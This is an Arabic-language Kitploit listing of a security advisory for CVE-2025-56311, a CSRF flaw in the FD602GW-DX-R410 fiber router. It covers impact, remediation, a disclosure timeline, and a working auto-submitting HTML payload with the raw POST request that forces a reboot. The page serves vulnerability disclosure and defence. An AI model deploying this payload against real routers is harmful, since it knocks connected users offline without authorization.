Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/wrathfuldiety/cve-2025-56311
تحليل الثغرات الأمنيةالاستغلالأمن الويباختبار الاختراقالأوراق والأبحاثالتعلم والتعليم
GitHubwrathfuldiety/cve-2025-56311

CVE-2025-56311

ثغرة CSRF في جهاز التوجيه FD602GW-DX-R410 تسمح للمهاجمين عن بُعد بإعادة تشغيل الجهاز عبر طلب POST مخصص إلى /boaform/admin/formReboot عندما يكون المسؤول مُوثقًا.

عرض المستودع
2منذ 11 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-56311: نشرة أمنية – ثغرة CSRF في وظيفة إعادة التشغيل لجهاز التوجيه FD602GW-DX-R410

إثبات المفهوم ونشرة أمنية لثغرة تزوير الطلب عبر المواقع (CSRF) في واجهة الإدارة لجهاز التوجيه الليفي FD602GW-DX-R410 (البرنامج الثابت V2.2.14). توضح النشرة الأثر، ناقل الهجوم، والتوصيات للعلاج.

fd602gw-dx-r410-csrf-advisory

ثغرة CSRF في جهاز التوجيه FD602GW-DX-R410 تسمح للمهاجمين عن بُعد بإعادة تشغيل الجهاز عبر طلب POST مخصص إلى /boaform/admin/formReboot عندما يكون المسؤول مصادقًا.


نظرة عامة

تم اكتشاف ثغرة تزوير الطلب عبر المواقع (CSRF) في وحدة التحكم الإدارية المستندة إلى الويب لجهاز التوجيه الليفي FD602GW-DX-R410 (البرنامج الثابت V2.2.14). يسمح نقطة النهاية /boaform/admin/formReboot بطلبات POST لتشغيل إعادة تشغيل كاملة للجهاز دون رموز CSRF أو التحقق من المصدر. إذا زار مسؤول مصادق صفحة ضارة، يمكن إعادة تشغيل جهاز التوجيه عن بُعد دون موافقته.

  • CVE ID: CVE-2025-56311
  • تاريخ نشر النشرة: يوليو 2025
  • المكتشف: Hasanka Amarasinghe (باحث أمني مستقل)
  • البائع: Shenzhen C-Data Technology Co., Ltd.
  • المنتج المتأثر: جهاز التوجيه الليفي FD602GW-DX-R410
  • إصدار البرنامج الثابت: V2.2.14 (Build.1918.241111)
  • إصدار العتاد: R410.1B
  • إصدار محمل الإقلاع: V3.7-2312181457
  • خادم الويب: Boa/0.93.15
  • ناقل الوصول: عن بُعد (يجب أن يكون المسؤول المصادق مسجلاً للدخول)
  • الخطورة: متوسطة
  • نقاط CVSS v3.1 الأساسية: 5.4 (متوسطة)

  • المنتج المتأثر

    • الجهاز: جهاز التوجيه الليفي FD602GW-DX-R410
    • البرنامج الثابت: V2.2.14 (Build.1918.241111)
    • المكون: معالج إعادة التشغيل - /boaform/admin/formReboot
    • خادم الويب: Boa/0.93.15

    تفاصيل الثغرة

    • النوع: تزوير الطلب عبر المواقع (CSRF)
    • ناقل الهجوم: عن بُعد (يجب أن يكون المسؤول مسجلاً للدخول في جلسته)
    • المصادقة: لا حاجة للمهاجم (مطلوب جلسة مسؤول على متصفح الضحية)
    • الأثر: إعادة تشغيل غير مصرح بها للجهاز
    • استمرارية الحالة: جلسة عديمة الحالة، على الأرجح يتم تتبعها عبر IP أو رموز جلسة داخلية

    إثبات المفهوم (PoC)

    حمولة CSRF (HTML)

    root@kitploit:~
    <html>
      <!-- CSRF PoC - generated by Burp Suite Pro -->
      <body>
        <form action="http://192.168.1.1/boaform/admin/formReboot" method="POST">
          <input type="hidden" name="postSecurityFlag" value="+65535" />
          <input type="submit" value="Submit" />
        </form>
        <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
        </script>
      </body>
    </html>
    

    طلب HTTP

    root@kitploit:~
    POST /boaform/admin/formReboot HTTP/1.1
    Host: 192.168.1.1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 23
    
    postSecurityFlag=+65535
    

    الرد

    HTTP 200 OK؛ يعاد تشغيل جهاز التوجيه فوراً.


    التوصيات

    • تنفيذ رموز CSRF والتحقق الصارم من المصدر/المرجع في جميع نقاط النهاية الإدارية.
    • إبطال الجلسات القديمة أو المنفصلة وربط الجلسات بملفات تعريف ارتباط آمنة.
    • النظر في استخدام CAPTCHA أو مطالبات التأكيد قبل تنفيذ إجراءات مدمرة مثل إعادة التشغيل.
    • تقييد الوصول إلى واجهة الإدارة لعناوين IP موثوقة أو شبكات داخلية فقط.

    ناقل الهجوم

    • يتطلب أن يكون مسؤول جهاز التوجيه مصادقًا (مسجلاً للدخول).
    • يقوم المهاجم بإغراء الضحية لزيارة صفحة ويب ضارة تشغل طلب POST بصمت إلى نقطة إعادة التشغيل.
    • يقبل جهاز التوجيه الطلب المزيف ويعيد التشغيل فوراً، مما يسبب رفض الخدمة.

    الأثر

    • رفض الخدمة بسبب إعادة التشغيل القسرية.
    • فقدان توفر الشبكة لجميع المستخدمين المتصلين.
    • إمكانية الربط مع مشكلات أخرى (مثل اختطاف الجلسة أو XSS) لرفع الأثر.

    الجدول الزمني للإفصاح

    التاريخالإجراء
    يونيو 2025تم اكتشاف الثغرة
    يونيو 2025محاولة الإفصاح المسؤول (لا رد)
    يوليو 2025طلب CVE ID من MITRE
    يوليو 2025إعداد النشرة وانتظار النشر
    سبتمبر 2025تخصيص CVE، النشرة منشورة للعموم

    المراجع

    • البائع: Shenzhen C-Data Technology Co., Ltd.
    • الجهاز: FD602GW-DX-R410
    • البرنامج الثابت: V2.2.14
    • إشعار GitHub: https://github.com/wrathfulDiety/CVE-2025-56311

    إخلاء مسؤولية

    تم تقديم هذه النشرة لأغراض تعليمية والتوعية الأمنية. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام. تم إجراء جميع الاختبارات في بيئة خاضعة للتحكم.

    تنزيل الأداة